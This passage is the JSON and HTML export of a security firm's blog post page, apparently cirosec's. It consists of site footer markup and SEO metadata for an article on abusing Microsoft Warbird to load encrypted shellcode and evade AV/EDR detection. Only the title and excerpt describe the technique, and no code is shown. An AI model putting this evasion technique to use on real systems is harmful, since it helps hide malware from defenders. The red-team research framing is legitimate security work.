data-e-type=\"widget\" data-widget_type=\"theme-site-logo.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/cirosec.de\/en\/\">\n\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"626\" height=\"188\" src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2023\/08\/Logo_Cirosec_rgb_53x16mm-transparent.png\" class=\"attachment-full size-full wp-image-5868\" alt=\"\" srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2023\/08\/Logo_Cirosec_rgb_53x16mm-transparent.png 626w, https:\/\/cirosec.de\/wp-content\/uploads\/2023\/08\/Logo_Cirosec_rgb_53x16mm-transparent-300x90.png 300w\" sizes=\"(max-width: 626px) 100vw, 626px\" \/>\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-85f2a11 elementor-widget__width-initial elementor-widget elementor-widget-text-editor\" data-id=\"85f2a11\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Competent IT security consulting, pentests, incident response and training<\/p>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-5731ee0 elementor-widget__width-initial elementor-widget elementor-widget-text-editor\" data-id=\"5731ee0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>cirosec GmbH<br \/>Ferdinand-Braun-Stra\u00dfe 4<br \/>74074 Heilbronn, Germany<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-c7c447f\" data-id=\"c7c447f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4826023 elementor-widget elementor-widget-heading\" data-id=\"4826023\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h6 class=\"elementor-heading-title elementor-size-default\">Quicklinks<\/h6>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-f26d479 elementor-nav-menu__align-start elementor-nav-menu--dropdown-none elementor-widget elementor-widget-nav-menu\" data-id=\"f26d479\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;layout&quot;:&quot;vertical&quot;,&quot;submenu_icon&quot;:{&quot;value&quot;:&quot;&lt;i class=\\&quot;fas fa-caret-down\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;\\\/i&gt;&quot;,&quot;library&quot;:&quot;fa-solid&quot;}}\" data-widget_type=\"nav-menu.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t<nav aria-label=\"Menu\" class=\"elementor-nav-menu--main elementor-nav-menu__container elementor-nav-menu--layout-vertical e--pointer-none\">\n\t\t\t\t<ul id=\"menu-1-f26d479\" class=\"elementor-nav-menu sm-vertical\"><li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9132\"><a href=\"https:\/\/cirosec.de\/en\/about-us\/\" class=\"elementor-item\">About us<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9133\"><a href=\"https:\/\/cirosec.de\/en\/services\/\" class=\"elementor-item\">Services<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9134\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/\" class=\"elementor-item\">Trainings<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9139\"><a href=\"https:\/\/cirosec.de\/en\/secure-email-communication-with-cirosec\/\" class=\"elementor-item\">Secure Email Communication with cirosec<\/a><\/li>\n<\/ul>\t\t\t<\/nav>\n\t\t\t\t\t\t<nav class=\"elementor-nav-menu--dropdown elementor-nav-menu__container\" aria-hidden=\"true\">\n\t\t\t\t<ul id=\"menu-2-f26d479\" class=\"elementor-nav-menu sm-vertical\"><li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9132\"><a href=\"https:\/\/cirosec.de\/en\/about-us\/\" class=\"elementor-item\" tabindex=\"-1\">About us<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9133\"><a href=\"https:\/\/cirosec.de\/en\/services\/\" class=\"elementor-item\" tabindex=\"-1\">Services<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9134\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/\" class=\"elementor-item\" tabindex=\"-1\">Trainings<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9139\"><a href=\"https:\/\/cirosec.de\/en\/secure-email-communication-with-cirosec\/\" class=\"elementor-item\" tabindex=\"-1\">Secure Email Communication with cirosec<\/a><\/li>\n<\/ul>\t\t\t<\/nav>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-29e8304\" data-id=\"29e8304\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-14232af elementor-widget elementor-widget-heading\" data-id=\"14232af\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h6 class=\"elementor-heading-title elementor-size-default\">Social Media<\/h6>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-c23ea92 elementor-nav-menu__align-start elementor-nav-menu--dropdown-none elementor-widget elementor-widget-nav-menu\" data-id=\"c23ea92\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;layout&quot;:&quot;vertical&quot;,&quot;submenu_icon&quot;:{&quot;value&quot;:&quot;&lt;i class=\\&quot;fas fa-caret-down\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;\\\/i&gt;&quot;,&quot;library&quot;:&quot;fa-solid&quot;}}\" data-widget_type=\"nav-menu.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t<nav aria-label=\"Menu\" class=\"elementor-nav-menu--main elementor-nav-menu__container elementor-nav-menu--layout-vertical e--pointer-none\">\n\t\t\t\t<ul id=\"menu-1-c23ea92\" class=\"elementor-nav-menu sm-vertical\"><li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-13039\"><a target=\"_blank\" href=\"https:\/\/www.instagram.com\/cirosecgmbh\" class=\"elementor-item\">Instagram<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-9136\"><a target=\"_blank\" href=\"https:\/\/www.xing.com\/pages\/cirosecgmbh\" class=\"elementor-item\">Xing<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-9137\"><a target=\"_blank\" href=\"https:\/\/www.linkedin.com\/company\/cirosec-gmbh\/\" class=\"elementor-item\">LinkedIn<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-9138\"><a target=\"_blank\" href=\"https:\/\/twitter.com\/cirosec\" class=\"elementor-item\">X (Twitter)<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-21563\"><a href=\"https:\/\/infosec.exchange\/@cirosec\" class=\"elementor-item\">Mastodon<\/a><\/li>\n<\/ul>\t\t\t<\/nav>\n\t\t\t\t\t\t<nav class=\"elementor-nav-menu--dropdown elementor-nav-menu__container\" aria-hidden=\"true\">\n\t\t\t\t<ul id=\"menu-2-c23ea92\" class=\"elementor-nav-menu sm-vertical\"><li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-13039\"><a target=\"_blank\" href=\"https:\/\/www.instagram.com\/cirosecgmbh\" class=\"elementor-item\" tabindex=\"-1\">Instagram<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-9136\"><a target=\"_blank\" href=\"https:\/\/www.xing.com\/pages\/cirosecgmbh\" class=\"elementor-item\" tabindex=\"-1\">Xing<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-9137\"><a target=\"_blank\" href=\"https:\/\/www.linkedin.com\/company\/cirosec-gmbh\/\" class=\"elementor-item\" tabindex=\"-1\">LinkedIn<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-9138\"><a target=\"_blank\" href=\"https:\/\/twitter.com\/cirosec\" class=\"elementor-item\" tabindex=\"-1\">X (Twitter)<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-21563\"><a href=\"https:\/\/infosec.exchange\/@cirosec\" class=\"elementor-item\" tabindex=\"-1\">Mastodon<\/a><\/li>\n<\/ul>\t\t\t<\/nav>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-871a164\" data-id=\"871a164\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a46aa52 elementor-widget elementor-widget-heading\" data-id=\"a46aa52\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h6 class=\"elementor-heading-title elementor-size-default\">Legal<\/h6>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-50e6031 elementor-nav-menu__align-start elementor-nav-menu--dropdown-none elementor-widget elementor-widget-nav-menu\" data-id=\"50e6031\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;layout&quot;:&quot;vertical&quot;,&quot;submenu_icon&quot;:{&quot;value&quot;:&quot;&lt;i class=\\&quot;fas fa-caret-down\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;\\\/i&gt;&quot;,&quot;library&quot;:&quot;fa-solid&quot;}}\" data-widget_type=\"nav-menu.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t<nav aria-label=\"Menu\" class=\"elementor-nav-menu--main elementor-nav-menu__container elementor-nav-menu--layout-vertical e--pointer-none\">\n\t\t\t\t<ul id=\"menu-1-50e6031\" class=\"elementor-nav-menu sm-vertical\"><li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9146\"><a href=\"https:\/\/cirosec.de\/en\/imprint\/\" class=\"elementor-item\">Imprint<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9147\"><a href=\"https:\/\/cirosec.de\/en\/privacy-policy\/\" class=\"elementor-item\">Privacy Policy<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9148\"><a href=\"https:\/\/cirosec.de\/en\/cirosec-responsible-disclosure-policy\/\" class=\"elementor-item\">cirosec Responsible Disclosure Policy<\/a><\/li>\n<\/ul>\t\t\t<\/nav>\n\t\t\t\t\t\t<nav class=\"elementor-nav-menu--dropdown elementor-nav-menu__container\" aria-hidden=\"true\">\n\t\t\t\t<ul id=\"menu-2-50e6031\" class=\"elementor-nav-menu sm-vertical\"><li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9146\"><a href=\"https:\/\/cirosec.de\/en\/imprint\/\" class=\"elementor-item\" tabindex=\"-1\">Imprint<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9147\"><a href=\"https:\/\/cirosec.de\/en\/privacy-policy\/\" class=\"elementor-item\" tabindex=\"-1\">Privacy Policy<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9148\"><a href=\"https:\/\/cirosec.de\/en\/cirosec-responsible-disclosure-policy\/\" class=\"elementor-item\" tabindex=\"-1\">cirosec Responsible Disclosure Policy<\/a><\/li>\n<\/ul>\t\t\t<\/nav>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/footer>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>November 7, 2024 &#8211; In this blog post, we\u2019ll be covering Microsoft Warbird and how we can abuse it to sneakily load shellcode without being detected by AV or EDR solutions. We\u2019ll show how we can encrypt our shellcode and let the Windows kernel decrypt and load it for us using the Warbird API.<br \/>\n<br \/>\nAuthor: Jan-Luca Gruber and Frederik Reiter<\/p>\n","protected":false},"author":43,"featured_media":18577,"comment_status":"closed","ping_status":"open","sticky":false,"template":"elementor_canvas","format":"standard","meta":{"footnotes":""},"categories":[7,34,57,56],"tags":[],"class_list":["post-20296","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog","category-red-teaming","category-reverse-engineering","category-windows"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Abusing Microsoft Warbird for Shellcode Execution - cirosec<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/cirosec.de\/en\/news\/abusing-microsoft-warbird-for-shellcode-execution\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Abusing Microsoft Warbird for Shellcode Execution - cirosec\" \/>\n<meta property=\"og:description\" content=\"November 7, 2024 - In this blog post, we\u2019ll be covering Microsoft Warbird and how we can abuse it to sneakily load shellcode without being detected by AV or EDR solutions. We\u2019ll show how we can encrypt our shellcode and let the Windows kernel decrypt and load it for us using the Warbird API. Author: Jan-Luca Gruber and Frederik Reiter\" \/>\n<meta property=\"og:url\" content=\"https:\/\/cirosec.de\/en\/news\/abusing-microsoft-warbird-for-shellcode-execution\/\" \/>\n<meta property=\"og:site_name\" content=\"cirosec\" \/>\n<meta property=\"article:published_time\" content=\"2024-11-07T10:00:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-12-17T11:02:04+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/alexander-sinn-YYUM2sNvnvU-unsplash-scaled.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"2560\" \/>\n\t<meta property=\"og:image:height\" content=\"1710\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"ne@cirosec.de\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"ne@cirosec.de\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"19 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/abusing-microsoft-warbird-for-shellcode-execution\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/abusing-microsoft-warbird-for-shellcode-execution\\\/\"},\"author\":{\"name\":\"ne@cirosec.de\",\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/#\\\/schema\\\/person\\\/a502baf6d9f9698b9b9236805b52fe73\"},\"headline\":\"Abusing Microsoft Warbird for Shellcode Execution\",\"datePublished\":\"2024-11-07T10:00:00+00:00\",\"dateModified\":\"2025-12-17T11:02:04+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/abusing-microsoft-warbird-for-shellcode-execution\\\/\"},\"wordCount\":2434,\"publisher\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/abusing-microsoft-warbird-for-shellcode-execution\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/cirosec.de\\\/wp-content\\\/uploads\\\/2024\\\/07\\\/alexander-sinn-YYUM2sNvnvU-unsplash-scaled.jpg\",\"articleSection\":[\"Blog\",\"Red Teaming\",\"Reverse Engineering\",\"Windows\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/abusing-microsoft-warbird-for-shellcode-execution\\\/\",\"url\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/abusing-microsoft-warbird-for-shellcode-execution\\\/\",\"name\":\"Abusing Microsoft Warbird for Shellcode Execution - cirosec\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/abusing-microsoft-warbird-for-shellcode-execution\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/abusing-microsoft-warbird-for-shellcode-execution\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/cirosec.de\\\/wp-content\\\/uploads\\\/2024\\\/07\\\/alexander-sinn-YYUM2sNvnvU-unsplash-scaled.jpg\",\"datePublished\":\"2024-11-07T10:00:00+00:00\",\"dateModified\":\"2025-12-17T11:02:04+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/abusing-microsoft-warbird-for-shellcode-execution\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/abusing-microsoft-warbird-for-shellcode-execution\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/abusing-microsoft-warbird-for-shellcode-execution\\\/#primaryimage\",\"url\":\"https:\\\/\\\/cirosec.de\\\/wp-content\\\/uploads\\\/2024\\\/07\\\/alexander-sinn-YYUM2sNvnvU-unsplash-scaled.jpg\",\"contentUrl\":\"https:\\\/\\\/cirosec.de\\\/wp-content\\\/uploads\\\/2024\\\/07\\\/alexander-sinn-YYUM2sNvnvU-unsplash-scaled.jpg\",\"width\":2560,\"height\":1710},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/abusing-microsoft-warbird-for-shellcode-execution\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Startseite\",\"item\":\"https:\\\/\\\/cirosec.de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Abusing Microsoft Warbird for Shellcode Execution\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/cirosec.de\\\/en\\\/\",\"name\":\"cirosec\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/cirosec.de\\\/en\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/#organization\",\"name\":\"cirosec\",\"url\":\"https:\\\/\\\/cirosec.de\\\/en\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/cirosec.de\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/Logo_Cirosec_rgb_53x16mm-transparent.png\",\"contentUrl\":\"https:\\\/\\\/cirosec.de\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/Logo_Cirosec_rgb_53x16mm-transparent.png\",\"width\":626,\"height\":188,\"caption\":\"cirosec\"},\"image\":{\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/cirosec.de\\\/en\\\/#\\\/schema\\\/person\\\/a502baf6d9f9698b9b9236805b52fe73\",\"name\":\"ne@cirosec.de\",\"url\":\"https:\\\/\\\/cirosec.de\\\/en\\\/news\\\/author\\\/necirosec-de\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Abusing Microsoft Warbird for Shellcode Execution - cirosec","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/cirosec.de\/en\/news\/abusing-microsoft-warbird-for-shellcode-execution\/","og_locale":"en_US","og_type":"article","og_title":"Abusing Microsoft Warbird for Shellcode Execution - cirosec","og_description":"November 7, 2024 - In this blog post, we\u2019ll be covering Microsoft Warbird and how we can abuse it to sneakily load shellcode without being detected by AV or EDR solutions. We\u2019ll show how we can encrypt our shellcode and let the Windows kernel decrypt and load it for us using the Warbird API. Author: Jan-Luca Gruber and Frederik Reiter","og_url":"https:\/\/cirosec.de\/en\/news\/abusing-microsoft-warbird-for-shellcode-execution\/","og_site_name":"cirosec","article_published_time":"2024-11-07T10:00:00+00:00","article_modified_time":"2025-12-17T11:02:04+00:00","og_image":[{"width":2560,"height":1710,"url":"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/alexander-sinn-YYUM2sNvnvU-unsplash-scaled.jpg","type":"image\/jpeg"}],"author":"ne@cirosec.de","twitter_card":"summary_large_image","twitter_misc":{"Written by":"ne@cirosec.de","Est. reading time":"19 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/cirosec.de\/en\/news\/abusing-microsoft-warbird-for-shellcode-execution\/#article","isPartOf":{"@id":"https:\/\/cirosec.de\/en\/news\/abusing-microsoft-warbird-for-shellcode-execution\/"},"author":{"name":"ne@cirosec.de","@id":"https:\/\/cirosec.de\/en\/#\/schema\/person\/a502baf6d9f9698b9b9236805b52fe73"},"headline":"Abusing Microsoft Warbird for Shellcode Execution","datePublished":"2024-11-07T10:00:00+00:00","dateModified":"2025-12-17T11:02:04+00:00","mainEntityOfPage":{"@id":"https:\/\/cirosec.de\/en\/news\/abusing-microsoft-warbird-for-shellcode-execution\/"},"wordCount":2434,"publisher":{"@id":"https:\/\/cirosec.de\/en\/#organization"},"image":{"@id":"https:\/\/cirosec.de\/en\/news\/abusing-microsoft-warbird-for-shellcode-execution\/#primaryimage"},"thumbnailUrl":"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/alexander-sinn-YYUM2sNvnvU-unsplash-scaled.jpg","articleSection":["Blog","Red Teaming","Reverse Engineering","Windows"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/cirosec.de\/en\/news\/abusing-microsoft-warbird-for-shellcode-execution\/","url":"https:\/\/cirosec.de\/en\/news\/abusing-microsoft-warbird-for-shellcode-execution\/","name":"Abusing Microsoft Warbird for Shellcode Execution - cirosec","isPartOf":{"@id":"https:\/\/cirosec.de\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/cirosec.de\/en\/news\/abusing-microsoft-warbird-for-shellcode-execution\/#primaryimage"},"image":{"@id":"https:\/\/cirosec.de\/en\/news\/abusing-microsoft-warbird-for-shellcode-execution\/#primaryimage"},"thumbnailUrl":"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/alexander-sinn-YYUM2sNvnvU-unsplash-scaled.jpg","datePublished":"2024-11-07T10:00:00+00:00","dateModified":"2025-12-17T11:02:04+00:00","breadcrumb":{"@id":"https:\/\/cirosec.de\/en\/news\/abusing-microsoft-warbird-for-shellcode-execution\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/cirosec.de\/en\/news\/abusing-microsoft-warbird-for-shellcode-execution\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/cirosec.de\/en\/news\/abusing-microsoft-warbird-for-shellcode-execution\/#primaryimage","url":"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/alexander-sinn-YYUM2sNvnvU-unsplash-scaled.jpg","contentUrl":"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/alexander-sinn-YYUM2sNvnvU-unsplash-scaled.jpg","width":2560,"height":1710},{"@type":"BreadcrumbList","@id":"https:\/\/cirosec.de\/en\/news\/abusing-microsoft-warbird-for-shellcode-execution\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Startseite","item":"https:\/\/cirosec.de\/"},{"@type":"ListItem","position":2,"name":"Abusing Microsoft Warbird for Shellcode Execution"}]},{"@type":"WebSite","@id":"https:\/\/cirosec.de\/en\/#website","url":"https:\/\/cirosec.de\/en\/","name":"cirosec","description":"","publisher":{"@id":"https:\/\/cirosec.de\/en\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/cirosec.de\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/cirosec.de\/en\/#organization","name":"cirosec","url":"https:\/\/cirosec.de\/en\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/cirosec.de\/en\/#\/schema\/logo\/image\/","url":"https:\/\/cirosec.de\/wp-content\/uploads\/2023\/08\/Logo_Cirosec_rgb_53x16mm-transparent.png","contentUrl":"https:\/\/cirosec.de\/wp-content\/uploads\/2023\/08\/Logo_Cirosec_rgb_53x16mm-transparent.png","width":626,"height":188,"caption":"cirosec"},"image":{"@id":"https:\/\/cirosec.de\/en\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/cirosec.de\/en\/#\/schema\/person\/a502baf6d9f9698b9b9236805b52fe73","name":"ne@cirosec.de","url":"https:\/\/cirosec.de\/en\/news\/author\/necirosec-de\/"}]}},"_links":{"self":[{"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/posts\/20296","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/users\/43"}],"replies":[{"embeddable":true,"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/comments?post=20296"}],"version-history":[{"count":0,"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/posts\/20296\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/media\/18577"}],"wp:attachment":[{"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/media?parent=20296"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/categories?post=20296"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cirosec.de\/en\/wp-json\/wp\/v2\/tags?post=20296"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}